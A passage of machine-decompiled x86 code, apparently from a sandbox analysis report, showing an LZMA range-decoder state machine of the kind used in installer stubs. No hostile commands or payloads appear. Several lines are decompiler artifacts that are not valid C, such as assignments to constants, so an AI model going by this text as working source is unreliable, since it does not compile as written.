                                        				signed int _t533;
                                        				void _t534;
                                        				void* _t535;
                                        				signed int _t536;
                                        				signed int _t565;
                                        				signed int _t568;
                                        				signed int _t589;
                                        				signed int* _t606;
                                        				void* _t613;
                                        
                                        				L0:
                                        				while(1) {
                                        					L0:
                                        					if( *(_t613 - 0x40) != 0) {
                                        						L89:
                                        						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                        						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                        						L69:
                                        						_t606 =  *(_t613 - 0x58);
                                        						 *(_t613 - 0x84) = 0x12;
                                        						L132:
                                        						 *(_t613 - 0x54) = _t606;
                                        						L133:
                                        						_t532 =  *_t606;
                                        						_t589 = _t532 & 0x0000ffff;
                                        						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                        						if( *(_t613 - 0xc) >= _t565) {
                                        							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                        							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                        							 *(_t613 - 0x40) = 1;
                                        							_t533 = _t532 - (_t532 >> 5);
                                        							 *_t606 = _t533;
                                        						} else {
                                        							 *(_t613 - 0x10) = _t565;
                                        							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                        							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                        						}
                                        						if( *(_t613 - 0x10) >= 0x1000000) {
                                        							L139:
                                        							_t534 =  *(_t613 - 0x84);
                                        							L140:
                                        							 *(_t613 - 0x88) = _t534;
                                        							goto L1;
                                        						} else {
                                        							L137:
                                        							if( *(_t613 - 0x6c) == 0) {
                                        								 *(_t613 - 0x88) = 5;
                                        								goto L170;
                                        							}
                                        							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                        							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                        							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                        							goto L139;
                                        						}
                                        					} else {
                                        						if( *(__ebp - 0x60) == 0) {
                                        							L171:
                                        							_t536 = _t535 | 0xffffffff;
                                        							L172:
                                        							return _t536;
                                        						}
                                        						__eax = 0;
                                        						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                        						0 | _t258 = _t258 + _t258 + 9;
                                        						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                        						L75:
                                        						if( *(__ebp - 0x64) == 0) {
                                        							 *(__ebp - 0x88) = 0x1b;
                                        							L170:
                                        							_t568 = 0x22;
                                        							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                        							_t536 = 0;
                                        							goto L172;
                                        						}
                                        						__eax =  *(__ebp - 0x14);
                                        						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        						if(__eax >=  *(__ebp - 0x74)) {
                                        							__eax = __eax +  *(__ebp - 0x74);
                                        						}
                                        						__edx =  *(__ebp - 8);
                                        						__cl =  *(__eax + __edx);
                                        						__eax =  *(__ebp - 0x14);
                                        						 *(__ebp - 0x5c) = __cl;
                                        						 *(__eax + __edx) = __cl;
                                        						__eax = __eax + 1;
                                        						__edx = 0;
                                        						_t274 = __eax %  *(__ebp - 0x74);
                                        						__eax = __eax /  *(__ebp - 0x74);
                                        						__edx = _t274;
                                        						__eax =  *(__ebp - 0x68);
                                        						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                        						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        						_t283 = __ebp - 0x64;
                                        						 *_t283 =  *(__ebp - 0x64) - 1;
                                        						 *( *(__ebp - 0x68)) = __cl;
                                        						L79:
                                        						 *(__ebp - 0x14) = __edx;
                                        						L80:
                                        						 *(__ebp - 0x88) = 2;
                                        					}
                                        					L1:
                                        					_t535 =  *(_t613 - 0x88);
                                        					if(_t535 > 0x1c) {
                                        						goto L171;
                                        					}
                                        					switch( *((intOrPtr*)(_t535 * 4 +  &M00406F09))) {
                                        						case 0:
                                        							if( *(_t613 - 0x6c) == 0) {
                                        								goto L170;
                                        							}
                                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                        							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                        							_t535 =  *( *(_t613 - 0x70));
                                        							if(_t535 > 0xe1) {
                                        								goto L171;
                                        							}
                                        							_t539 = _t535 & 0x000000ff;
                                        							_push(0x2d);
                                        							asm("cdq");
                                        							_pop(_t570);
                                        							_push(9);
                                        							_pop(_t571);
                                        							_t609 = _t539 / _t570;
                                        							_t541 = _t539 % _t570 & 0x000000ff;
                                        							asm("cdq");
                                        							_t604 = _t541 % _t571 & 0x000000ff;
                                        							 *(_t613 - 0x3c) = _t604;
                                        							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                        							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                        							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                        							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                        								L10:
                                        								if(_t612 == 0) {
                                        									L12:
                                        									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                        									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                        									goto L15;
                                        								} else {
                                        									goto L11;
                                        								}
                                        								do {
                                        									L11:
                                        									_t612 = _t612 - 1;
                                        									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                        								} while (_t612 != 0);
                                        								goto L12;
                                        							}
                                        							if( *(_t613 - 4) != 0) {
                                        								GlobalFree( *(_t613 - 4)); // executed
                                        							}
                                        							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                        							 *(_t613 - 4) = _t535;
                                        							if(_t535 == 0) {
                                        								goto L171;
                                        							} else {
                                        								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                        								goto L10;
                                        							}
                                        						case 1:
                                        							L13:
                                        							__eflags =  *(_t613 - 0x6c);
                                        							if( *(_t613 - 0x6c) == 0) {
                                        								 *(_t613 - 0x88) = 1;
                                        								goto L170;
                                        							}
                                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                        							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                        							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                        							_t45 = _t613 - 0x48;
                                        							 *_t45 =  *(_t613 - 0x48) + 1;
                                        							__eflags =  *_t45;
                                        							L15:
                                        							if( *(_t613 - 0x48) < 4) {
                                        								goto L13;
                                        							}
                                        							_t547 =  *(_t613 - 0x40);
                                        							if(_t547 ==  *(_t613 - 0x74)) {
                                        								L20:
                                        								 *(_t613 - 0x48) = 5;
                                        								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                        								goto L23;
                                        							}
                                        							 *(_t613 - 0x74) = _t547;
                                        							if( *(_t613 - 8) != 0) {
                                        								GlobalFree( *(_t613 - 8)); // executed
                                        							}
                                        							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                        							 *(_t613 - 8) = _t535;
                                        							if(_t535 == 0) {
                                        								goto L171;
                                        							} else {
                                        								goto L20;
                                        							}
                                        						case 2:
                                        							L24:
                                        							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                        							 *(_t613 - 0x84) = 6;
                                        							 *(_t613 - 0x4c) = _t554;
                                        							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                        							goto L132;
                                        						case 3:
                                        							L21:
                                        							__eflags =  *(_t613 - 0x6c);
                                        							if( *(_t613 - 0x6c) == 0) {
                                        								 *(_t613 - 0x88) = 3;
                                        								goto L170;
                                        							}
                                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                        							_t67 = _t613 - 0x70;
                                        							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                        							__eflags =  *_t67;
                                        							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                        							L23:
                                        							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                        							if( *(_t613 - 0x48) != 0) {
                                        								goto L21;
                                        							}
                                        							goto L24;
                                        						case 4:
                                        							goto L133;
                                        						case 5:
                                        							goto L137;
                                        						case 6:
                                        							__edx = 0;
                                        							__eflags =  *(__ebp - 0x40);
                                        							if( *(__ebp - 0x40) != 0) {
                                        								__eax =  *(__ebp - 4);
                                        								__ecx =  *(__ebp - 0x38);
                                        								 *(__ebp - 0x34) = 1;
                                        								 *(__ebp - 0x84) = 7;
                                        								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                        								goto L132;
                                        							}
                                        							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                        							__esi =  *(__ebp - 0x60);
                                        							__cl = 8;
                                        							__cl = 8 -  *(__ebp - 0x3c);
                                        							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                        							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                        							__ecx =  *(__ebp - 0x3c);
                                        							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                        							__ecx =  *(__ebp - 4);
                                        							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                        							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                        							__eflags =  *(__ebp - 0x38) - 4;
                                        							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                        							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                        							if( *(__ebp - 0x38) >= 4) {
                                        								__eflags =  *(__ebp - 0x38) - 0xa;
                                        								if( *(__ebp - 0x38) >= 0xa) {
                                        									_t98 = __ebp - 0x38;
                                        									 *_t98 =  *(__ebp - 0x38) - 6;
                                        									__eflags =  *_t98;
                                        								} else {
                                        									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                        								}
                                        							} else {
                                        								 *(__ebp - 0x38) = 0;
                                        							}
                                        							__eflags =  *(__ebp - 0x34) - __edx;
                                        							if( *(__ebp - 0x34) == __edx) {
                                        								__ebx = 0;
                                        								__ebx = 1;
                                        								goto L61;
                                        							} else {
                                        								__eax =  *(__ebp - 0x14);
                                        								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        								__eflags = __eax -  *(__ebp - 0x74);
                                        								if(__eax >=  *(__ebp - 0x74)) {
                                        									__eax = __eax +  *(__ebp - 0x74);
                                        									__eflags = __eax;
                                        								}
                                        								__ecx =  *(__ebp - 8);
                                        								__ebx = 0;
                                        								__ebx = 1;
                                        								__al =  *((intOrPtr*)(__eax + __ecx));
                                        								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                        								goto L41;
                                        							}
                                        						case 7:
                                        							__eflags =  *(__ebp - 0x40) - 1;
                                        							if( *(__ebp - 0x40) != 1) {
                                        								__eax =  *(__ebp - 0x24);
                                        								 *(__ebp - 0x80) = 0x16;
                                        								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                        								__eax =  *(__ebp - 0x28);
                                        								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                        								__eax =  *(__ebp - 0x2c);
                                        								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                        								__eax = 0;
                                        								__eflags =  *(__ebp - 0x38) - 7;
                                        								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                        								__al = __al & 0x000000fd;
                                        								__eax = (__eflags >= 0) - 1 + 0xa;
                                        								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                        								__eax =  *(__ebp - 4);
                                        								__eax =  *(__ebp - 4) + 0x664;
                                        								__eflags = __eax;
                                        								 *(__ebp - 0x58) = __eax;
                                        								goto L69;
                                        							}
                                        							__eax =  *(__ebp - 4);
                                        							__ecx =  *(__ebp - 0x38);
                                        							 *(__ebp - 0x84) = 8;
                                        							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                        							goto L132;
                                        						case 8:
                                        							__eflags =  *(__ebp - 0x40);
                                        							if( *(__ebp - 0x40) != 0) {
                                        								__eax =  *(__ebp - 4);
                                        								__ecx =  *(__ebp - 0x38);
                                        								 *(__ebp - 0x84) = 0xa;
                                        								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                        							} else {
                                        								__eax =  *(__ebp - 0x38);
                                        								__ecx =  *(__ebp - 4);
                                        								__eax =  *(__ebp - 0x38) + 0xf;
                                        								 *(__ebp - 0x84) = 9;
                                        								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                        								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                        							}
                                        							goto L132;
                                        						case 9:
                                        							goto L0;
                                        						case 0xa:
                                        							__eflags =  *(__ebp - 0x40);
                                        							if( *(__ebp - 0x40) != 0) {
                                        								__eax =  *(__ebp - 4);
                                        								__ecx =  *(__ebp - 0x38);
                                        								 *(__ebp - 0x84) = 0xb;
                                        								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                        								goto L132;
                                        							}
                                        							__eax =  *(__ebp - 0x28);
                                        							goto L88;
                                        						case 0xb:
                                        							__eflags =  *(__ebp - 0x40);
                                        							if( *(__ebp - 0x40) != 0) {
                                        								__ecx =  *(__ebp - 0x24);
                                        								__eax =  *(__ebp - 0x20);
                                        								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                        							} else {
                                        								__eax =  *(__ebp - 0x24);
                                        							}
                                        							__ecx =  *(__ebp - 0x28);
                                        							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                        							L88:
                                        							__ecx =  *(__ebp - 0x2c);
                                        							 *(__ebp - 0x2c) = __eax;
                                        							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                        							goto L89;
                                        						case 0xc:
                                        							L99:
                                        							__eflags =  *(__ebp - 0x6c);
                                        							if( *(__ebp - 0x6c) == 0) {
                                        								 *(__ebp - 0x88) = 0xc;
                                        								goto L170;
                                        							}
                                        							__ecx =  *(__ebp - 0x70);
                                        							__eax =  *(__ebp - 0xc);
                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							_t334 = __ebp - 0x70;
                                        							 *_t334 =  *(__ebp - 0x70) + 1;
                                        							__eflags =  *_t334;
                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							__eax =  *(__ebp - 0x2c);
                                        							goto L101;
                                        						case 0xd:
                                        							L37:
                                        							__eflags =  *(__ebp - 0x6c);
                                        							if( *(__ebp - 0x6c) == 0) {
                                        								 *(__ebp - 0x88) = 0xd;
                                        								goto L170;
                                        							}
                                        							__ecx =  *(__ebp - 0x70);
                                        							__eax =  *(__ebp - 0xc);
                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							_t122 = __ebp - 0x70;
                                        							 *_t122 =  *(__ebp - 0x70) + 1;
                                        							__eflags =  *_t122;
                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							L39:
                                        							__eax =  *(__ebp - 0x40);
                                        							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                        							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                        								goto L48;
                                        							}
                                        							__eflags = __ebx - 0x100;
                                        							if(__ebx >= 0x100) {
                                        								goto L54;
                                        							}
                                        							L41:
                                        							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                        							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                        							__ecx =  *(__ebp - 0x58);
                                        							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                        							 *(__ebp - 0x48) = __eax;
                                        							__eax = __eax + 1;
                                        							__eax = __eax << 8;
                                        							__eax = __eax + __ebx;
                                        							__esi =  *(__ebp - 0x58) + __eax * 2;
                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                        							__ax =  *__esi;
                                        							 *(__ebp - 0x54) = __esi;
                                        							__edx = __ax & 0x0000ffff;
                                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                        							__eflags =  *(__ebp - 0xc) - __ecx;
                                        							if( *(__ebp - 0xc) >= __ecx) {
                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        								__cx = __ax;
                                        								 *(__ebp - 0x40) = 1;
                                        								__cx = __ax >> 5;
                                        								__eflags = __eax;
                                        								__ebx = __ebx + __ebx + 1;
                                        								 *__esi = __ax;
                                        							} else {
                                        								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                        								 *(__ebp - 0x10) = __ecx;
                                        								0x800 = 0x800 - __edx;
                                        								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                        								__ebx = __ebx + __ebx;
                                        								 *__esi = __cx;
                                        							}
                                        							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        							 *(__ebp - 0x44) = __ebx;
                                        							if( *(__ebp - 0x10) >= 0x1000000) {
                                        								goto L39;
                                        							} else {
                                        								goto L37;
                                        							}
                                        						case 0xe:
                                        							L46:
                                        							__eflags =  *(__ebp - 0x6c);
                                        							if( *(__ebp - 0x6c) == 0) {
                                        								 *(__ebp - 0x88) = 0xe;
                                        								goto L170;
                                        							}
                                        							__ecx =  *(__ebp - 0x70);
                                        							__eax =  *(__ebp - 0xc);
                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							_t156 = __ebp - 0x70;
                                        							 *_t156 =  *(__ebp - 0x70) + 1;
                                        							__eflags =  *_t156;
                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							while(1) {
                                        								L48:
                                        								__eflags = __ebx - 0x100;
                                        								if(__ebx >= 0x100) {
                                        									break;
                                        								}
                                        								__eax =  *(__ebp - 0x58);
                                        								__edx = __ebx + __ebx;
                                        								__ecx =  *(__ebp - 0x10);
                                        								__esi = __edx + __eax;
                                        								__ecx =  *(__ebp - 0x10) >> 0xb;
                                        								__ax =  *__esi;
                                        								 *(__ebp - 0x54) = __esi;
                                        								__edi = __ax & 0x0000ffff;
                                        								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        								__eflags =  *(__ebp - 0xc) - __ecx;
                                        								if( *(__ebp - 0xc) >= __ecx) {
                                        									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        									__cx = __ax;
                                        									_t170 = __edx + 1; // 0x1
                                        									__ebx = _t170;
                                        									__cx = __ax >> 5;
                                        									__eflags = __eax;
                                        									 *__esi = __ax;
                                        								} else {
                                        									 *(__ebp - 0x10) = __ecx;
                                        									0x800 = 0x800 - __edi;
                                        									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        									__ebx = __ebx + __ebx;
                                        									 *__esi = __cx;
                                        								}
                                        								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        								 *(__ebp - 0x44) = __ebx;
                                        								if( *(__ebp - 0x10) >= 0x1000000) {
                                        									continue;
                                        								} else {
                                        									goto L46;
                                        								}
                                        							}
                                        							L54:
                                        							_t173 = __ebp - 0x34;
                                        							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                        							__eflags =  *_t173;
                                        							goto L55;
                                        						case 0xf:
                                        							L58:
                                        							__eflags =  *(__ebp - 0x6c);
                                        							if( *(__ebp - 0x6c) == 0) {
                                        								 *(__ebp - 0x88) = 0xf;
                                        								goto L170;
                                        							}
                                        							__ecx =  *(__ebp - 0x70);
                                        							__eax =  *(__ebp - 0xc);
                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							_t203 = __ebp - 0x70;
                                        							 *_t203 =  *(__ebp - 0x70) + 1;
                                        							__eflags =  *_t203;
                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							L60:
                                        							__eflags = __ebx - 0x100;
                                        							if(__ebx >= 0x100) {
                                        								L55:
                                        								__al =  *(__ebp - 0x44);
                                        								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                        								goto L56;
                                        							}
                                        							L61:
                                        							__eax =  *(__ebp - 0x58);
                                        							__edx = __ebx + __ebx;
                                        							__ecx =  *(__ebp - 0x10);
                                        							__esi = __edx + __eax;
                                        							__ecx =  *(__ebp - 0x10) >> 0xb;
                                        							__ax =  *__esi;
                                        							 *(__ebp - 0x54) = __esi;
                                        							__edi = __ax & 0x0000ffff;
                                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        							__eflags =  *(__ebp - 0xc) - __ecx;
                                        							if( *(__ebp - 0xc) >= __ecx) {
                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        								__cx = __ax;
                                        								_t217 = __edx + 1; // 0x1
                                        								__ebx = _t217;
                                        								__cx = __ax >> 5;
                                        								__eflags = __eax;
                                        								 *__esi = __ax;
                                        							} else {
                                        								 *(__ebp - 0x10) = __ecx;
                                        								0x800 = 0x800 - __edi;
                                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        								__ebx = __ebx + __ebx;
                                        								 *__esi = __cx;
                                        							}
                                        							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        							 *(__ebp - 0x44) = __ebx;
                                        							if( *(__ebp - 0x10) >= 0x1000000) {
                                        								goto L60;
                                        							} else {
                                        								goto L58;
                                        							}
                                        						case 0x10:
                                        							L109:
                                        							__eflags =  *(__ebp - 0x6c);
                                        							if( *(__ebp - 0x6c) == 0) {
                                        								 *(__ebp - 0x88) = 0x10;
                                        								goto L170;
                                        							}
                                        							__ecx =  *(__ebp - 0x70);
                                        							__eax =  *(__ebp - 0xc);
                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							_t365 = __ebp - 0x70;
                                        							 *_t365 =  *(__ebp - 0x70) + 1;
                                        							__eflags =  *_t365;
                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							goto L111;
                                        						case 0x11:
                                        							goto L69;
                                        						case 0x12:
                                        							__eflags =  *(__ebp - 0x40);
                                        							if( *(__ebp - 0x40) != 0) {
                                        								__eax =  *(__ebp - 0x58);
                                        								 *(__ebp - 0x84) = 0x13;
                                        								__esi =  *(__ebp - 0x58) + 2;
                                        								goto L132;
                                        							}
                                        							__eax =  *(__ebp - 0x4c);
                                        							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                        							__ecx =  *(__ebp - 0x58);
                                        							__eax =  *(__ebp - 0x4c) << 4;
                                        							__eflags = __eax;
                                        							__eax =  *(__ebp - 0x58) + __eax + 4;
                                        							goto L130;
                                        						case 0x13:
                                        							__eflags =  *(__ebp - 0x40);
                                        							if( *(__ebp - 0x40) != 0) {
                                        								_t469 = __ebp - 0x58;
                                        								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                        								__eflags =  *_t469;
                                        								 *(__ebp - 0x30) = 0x10;
                                        								 *(__ebp - 0x40) = 8;
                                        								L144:
                                        								 *(__ebp - 0x7c) = 0x14;
                                        								goto L145;
                                        							}
                                        							__eax =  *(__ebp - 0x4c);
                                        							__ecx =  *(__ebp - 0x58);
                                        							__eax =  *(__ebp - 0x4c) << 4;
                                        							 *(__ebp - 0x30) = 8;
                                        							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                        							L130:
                                        							 *(__ebp - 0x58) = __eax;
                                        							 *(__ebp - 0x40) = 3;
                                        							goto L144;
                                        						case 0x14:
                                        							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                        							__eax =  *(__ebp - 0x80);
                                        							goto L140;
                                        						case 0x15:
                                        							__eax = 0;
                                        							__eflags =  *(__ebp - 0x38) - 7;
                                        							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                        							__al = __al & 0x000000fd;
                                        							__eax = (__eflags >= 0) - 1 + 0xb;
                                        							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                        							goto L120;
                                        						case 0x16:
                                        							__eax =  *(__ebp - 0x30);
                                        							__eflags = __eax - 4;
                                        							if(__eax >= 4) {
                                        								_push(3);
                                        								_pop(__eax);
                                        							}
                                        							__ecx =  *(__ebp - 4);
                                        							 *(__ebp - 0x40) = 6;
                                        							__eax = __eax << 7;
                                        							 *(__ebp - 0x7c) = 0x19;
                                        							 *(__ebp - 0x58) = __eax;
                                        							goto L145;
                                        						case 0x17:
                                        							L145:
                                        							__eax =  *(__ebp - 0x40);
                                        							 *(__ebp - 0x50) = 1;
                                        							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                        							goto L149;
                                        						case 0x18:
                                        							L146:
                                        							__eflags =  *(__ebp - 0x6c);
                                        							if( *(__ebp - 0x6c) == 0) {
                                        								 *(__ebp - 0x88) = 0x18;
                                        								goto L170;
                                        							}
                                        							__ecx =  *(__ebp - 0x70);
                                        							__eax =  *(__ebp - 0xc);
                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							_t484 = __ebp - 0x70;
                                        							 *_t484 =  *(__ebp - 0x70) + 1;
                                        							__eflags =  *_t484;
                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                        							L148:
                                        							_t487 = __ebp - 0x48;
                                        							 *_t487 =  *(__ebp - 0x48) - 1;
                                        							__eflags =  *_t487;
                                        							L149:
                                        							__eflags =  *(__ebp - 0x48);
                                        							if( *(__ebp - 0x48) <= 0) {
                                        								__ecx =  *(__ebp - 0x40);
                                        								__ebx =  *(__ebp - 0x50);
                                        								0 = 1;
                                        								__eax = 1 << __cl;
                                        								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                        								__eax =  *(__ebp - 0x7c);
                                        								 *(__ebp - 0x44) = __ebx;
                                        								goto L140;
                                        							}
                                        							__eax =  *(__ebp - 0x50);
                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
